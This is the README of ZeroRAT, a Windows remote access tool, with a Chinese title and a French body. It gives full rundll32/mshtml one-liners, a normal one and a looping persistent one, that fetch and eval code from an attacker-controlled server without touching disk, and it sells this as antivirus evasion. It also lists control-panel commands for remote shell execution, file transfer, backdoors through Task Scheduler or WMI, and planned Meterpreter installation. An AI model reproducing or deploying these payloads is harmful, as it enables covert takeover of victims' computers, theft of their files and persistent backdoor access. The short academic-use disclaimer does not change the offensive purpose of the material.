
ZeroRAT是一款windows上的一句话远控
#ZeroRAT ##Introduction Un outil de contrôle à distance pour Windows. Le client n'a besoin que d'exécuter une seule commande, en utilisant les programmes natifs de Windows, sans écrire de fichier sur le disque, ce qui lui confère une capacité naturelle d'évitement des antivirus. Il ne persiste pas après redémarrage.
Dans le programme, download et upload sont vus du point de vue du client. Le téléchargement par le client depuis le serveur s'appelle download, et l'envoi par le client vers le serveur s'appelle upload.
##Configuration Dans config.py, modifiez l'adresse de connexion du client et le mot de passe d'administration du panneau de contrôle. N'oubliez pas de vérifier et de désactiver le mode debug.
Le programme dépend de Flask et sqlite3, installez-les avec pip.
##Client
Remplacez <ip>:<port> par l'adresse réelle de connexion.
Version normale
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Version persistante
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Serveur
Panneau d'administration : http://<ip>:<port>/server/
Les commandes supportées par le serveur sont :
sessions Lister les clients actifsuse <id> Sélectionner un client par son IDset <key> <value> Définir une variable globaleshow globals/downloads/uploads Afficher les variables globales, les fichiers téléchargeables par le client, les fichiers téléchargés par le clientdelete session Supprimer le client actueldelete download/upload <id> Supprimer un fichier par son IDupfile Téléverser un fichier vers le serveur et l'ajouter à la liste downloadsdownload Définissez les variables download_file et download_save_path pour que le client télécharge un fichier et le sauvegarde dans download_save_pathupload Définissez la variable upload_file pour que le client téléverse le fichier spécifié vers le serveurbackdoor tasks <time> Installer une backdoor via le Planificateur de tâches Windows, format horaire 00:00backdoor wmi Installer une backdoor via WMI, exécution toutes les heuresEn dehors des commandes ci-dessus, toute autre commande sera exécutée comme une commande système Windows.
Voir /static/js/xkcd_cli.js pour les détails des commandes.
##Développement Maintenance des commandes du panneau d'administration côté client : /static/js/xkcd_cli.js
Maintenance des commandes du panneau d'administration côté serveur : /controllers/server.py
Maintenance du client : /controllers/client.py
Génération du payload client : payload.py
Opérations liées à la base de données : /models/
##Contact http://5alt.me
md5_salt [AT] qq.com
##Références https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Avertissement L'utilisation de cet outil doit respecter les lois locales. Il est destiné uniquement à des fins de test académique. Il est strictement interdit de prendre le contrôle illégalement d'ordinateurs d'autrui. En cas de dommages, l'auteur décline toute responsabilité.
##License GPLV3
##TODO
meterpreter shellcode Installer Meterpreter via InstallUtil avec du shellcode, nécessite de définir LHOST et LPORT au préalable (migrate nécessaire pour continuer à recevoir des commandes, dépend de .NET Framework 2.0)meterpreter powershell Installer Meterpreter via PowerShell (dépend de PowerShell 1.0)